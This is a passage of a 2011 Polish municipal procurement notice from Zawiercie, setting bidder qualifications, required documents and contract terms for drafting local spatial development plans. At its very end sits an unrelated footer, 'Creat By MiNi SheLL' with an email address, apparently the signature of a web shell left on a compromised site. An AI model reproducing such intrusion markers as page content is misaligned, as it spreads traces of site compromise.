powyżej warunku zostanie dokonana wg formuły spełnia - nie spełnia. Zgodnie z art. 26 ust.2b ustawy Pzp, Wykonawca może polegać  na wiedzy i doświadczeniu niezbędnym do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący dysponowania zespołem projektowym składającym się z osób o wykształceniu  i przygotowaniu zawodowym związanym z teorią i praktyką w planowaniu przestrzennym: 1) przynajmniej jedna osoba jako główny projektant jest członkiem Izby Urbanistów (zgodnie z przepisami ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów - Dz.U. z 2001 r. Nr 5, poz. 42). Główny projektant musi posiadać doświadczenie w wykonaniu (samodzielnie lub w zespole) co najmniej dwóch uchwalonych i obowiązujących miejscowych planów zagospodarowania przestrzennego (lub zmian planu) - od podjęcia uchwały o przystąpieniu do jego sporządzenia lub zmiany - do podjęcia uchwały o jego uchwaleniu - według procedur i problematyki określonych w ustawie z dnia  27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r. Nr 80, poz. 717 z póź. zm.)  2) w zakresie opracowania ekofizjograficznego: osoba lub osoby wykonujące opracowanie ekofizjograficzne muszą posiadać doświadczenie w wykonaniu ww. opracowania. Co najmniej jedna osoba musi wykazać się sporządzeniem - co najmniej dwóch opracowań ekofizjograficznych podstawowych do planów lub studium (zmiany planów lub studium), uchwalonych i obowiązujących nie później niż na dzień składania ofert 
3) w zakresie prognozy oddziaływania na środowisko:
osoba lub osoby wykonujące prognozę oddziaływania na środowisko muszą posiadać doświadczenie w wykonywaniu ww. prognozy. Co najmniej jedna osoba musi wykazać się sporządzeniem - co najmniej dwóch opracowań ww. prognozy do miejscowych planów zagospodarowania przestrzennego (zmiany planów) lub studium (zmiany studium), uchwalonych i obowiązujących nie później niż na dzień składania ofert. W celu potwierdzenia spełniania warunków Wykonawca składa :  Oświadczenia o spełnianiu warunków udziału w postępowaniu, sporządzonego wg wzoru stanowiącego załącznik nr 1 do SIWZ, oraz Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami; zakres ww. dokumentu musi potwierdzać spełnienie odpowiednio warunku określonego powyżej.  Wzór wykazu znajduje się w załączniku nr 4 do SWIZ. Zamawiający wymaga, aby wykonawca wykazał nie później niż na dzień składania ofert spełnianie warunku o którym mowa powyżej. Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły spełnia - nie spełnia. Zgodnie z art. 26 ust.2b ustawy Pzp, Wykonawca może polegać  na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 5 do SIWZ;
2)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 6 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia.
2.	Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
2)	nastąpi przekształcenie podmiotowe Wykonawcy,
3)	w przypadku zmiany przepisów prawa wpływających na ważność wykonanego przedmiotu umowy, a także w przypadku konieczności doprecyzowania opinii, uzgodnień itp. lub przedłużających się uzgodnień nie z winy Wykonawcy - harmonogram, a także termin realizacji danego etapu prac i konsekwentnie następnych etapów oraz termin realizacji przedmiotu umowy może ulec wydłużeniu. 
4)	Wykonawca może żądać zmiany terminu wykonania przedmiotu umowy i poszczególnych etapów realizacji w przypadku, jeżeli Zamawiający zmieni dane niezbędne do jego wykonania.
5)	zmiany członków zespołu projektowego Wykonawcy, w przypadku wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja/ odejście z pracy lub innych uniemożliwiających należyte wykonywanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego w ogłoszeniu o zamówieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu ul. Leśna 2. 42-400 Zawiercie,  Wydział Zamówień Publicznych, pokój nr 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2011 godzina 10:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2.  Punkt Obsługi Interesanta (Informacja ) parter U. M..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin realizacji zamówienia: 12 miesięcy od daty podpisania umowy. Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zmówień Publicznych w dniu 29.11.2011r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com